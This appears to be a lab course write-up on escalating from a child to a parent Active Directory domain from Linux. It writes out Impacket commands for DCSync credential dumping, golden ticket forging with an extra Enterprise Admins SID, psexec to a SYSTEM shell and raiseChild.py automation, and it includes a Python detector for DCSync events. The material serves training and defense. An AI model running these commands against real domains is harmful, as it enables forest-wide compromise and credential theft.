🐧Attacking Domain Trusts From Linux

Just like with Windows, we can launch similar attacks from Linux.

We start by gathering the following information again:

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain

  • The FQDN of the child domain

  • The SID of the Enterprise Admins group of the root domain

Performing DCSync with secretsdump.py

Once we have control of the child domain, we can run a DCSync to grab the NTLM hash of the KRBTGT account:

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up...
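The DCSync above is what a defender sees on the domain controller as Security event 4662 carrying the directory-replication control-access rights. As an added example (not part of the original notes), the script below scans constructed 4662 records for those rights and alerts when the requesting principal is not a known domain controller computer account; the DC inventory, the JSON field layout and the sample events are assumptions made for the example, while the replication right GUIDs are the well-known values.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example, not part of the original notes. A DCSync run with secretsdump.py
exercises the DS-Replication-Get-Changes rights on the domain object; legitimate
replication is performed by domain controller computer accounts, so the same
rights exercised by any other principal deserve an alert.
"""
from __future__ import annotations

import json

# Well-known control-access right GUIDs used by directory replication.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed inventory of DC computer accounts (placeholder names for the example).
KNOWN_DC_ACCOUNTS = {"ACADEMY-EA-DC01$", "ACADEMY-EA-DC02$"}

# Constructed sample events as JSON lines; field names mimic 4662 EventData.
# The Properties value imitates the "%%7688 (Control Access) + GUID list" layout.
SAMPLE_EVENTS = """
{"EventID": 4662, "SubjectUserName": "ACADEMY-EA-DC02$", "SubjectDomainName": "INLANEFREIGHT", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "%%7688\\n\\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\\n\\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "htb-student_adm", "SubjectDomainName": "LOGISTICS", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "%%7688\\n\\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\\n\\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "LOGISTICS", "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "Properties": "%%7688\\n\\t{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10"}
"""


def replication_rights(properties: str) -> list[str]:
    """Return the names of replication rights present in a 4662 Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_GUIDS.items() if guid in props]


def is_suspicious_dcsync(event: dict) -> bool:
    """True when replication rights are exercised by something other than a known DC."""
    if event.get("EventID") != 4662:
        return False
    if not replication_rights(event.get("Properties", "")):
        return False
    # Domain controllers replicate among themselves; any other subject is an alert.
    return event.get("SubjectUserName", "").upper() not in KNOWN_DC_ACCOUNTS


def scan(jsonl: str) -> list[dict]:
    """Parse JSON-lines 4662 events and return one alert record per suspicious event."""
    alerts = []
    for line in jsonl.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if is_suspicious_dcsync(event):
            alerts.append({
                "subject": f"{event['SubjectDomainName']}\\{event['SubjectUserName']}",
                "rights": replication_rights(event["Properties"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"ALERT possible DCSync by {alert['subject']}: {', '.join(alert['rights'])}")
```

Only the second record is flagged: the first comes from a DC computer account and the third carries no replication right. In production the DC inventory should come from the directory (the Domain Controllers OU) rather than a hard-coded set, and the rule is worth pairing with a check that the request's source address is not a DC either.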

Performing SID Brute Force using lookupsid.py

We can now use SID brute forcing to find the SID of the child domain:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 

Looking for the Domain SID

We can refine this further by piping the output to grep with the "Domain SID" string:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

Grabbing the Domain SID & the Enterprise Admins RID

We can rerun the command against the parent DC to grab its domain SID together with the RID of the Enterprise Admins group:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Constructing a Golden Ticket using ticketer.py

We can now use ticketer.py to construct a Golden Ticket that is valid for accessing resources in the child domain. The ticket is saved in a ccache file, the credential cache format Kerberos uses to hold tickets:

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 tommy

Setting the KRB5CCNAME Env Variable

We make sure to point the KRB5CCNAME environment variable at the ccache file:

export KRB5CCNAME=hacker.ccache 

Getting a SYSTEM shell using Impacket

We should now be able to use psexec.py to authenticate to the parent's DC, which drops us into a SYSTEM shell:

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/tommy@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

C:\Windows\system32> whoami
nt authority\system

Performing the Attack with raiseChild.py

We can also perform the same attack with raiseChild.py, which automates escalating from the child domain to the parent domain. It works as follows:

  • Obtains the SID for the Enterprise Admins group of the parent domain

  • Retrieves the hash for the KRBTGT account in the child domain

  • Creates a Golden Ticket

  • Logs into the parent domain

  • Retrieves credentials for the Administrator account in the parent domain

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

We should be very careful using "autopwn" scripts during real engagements!
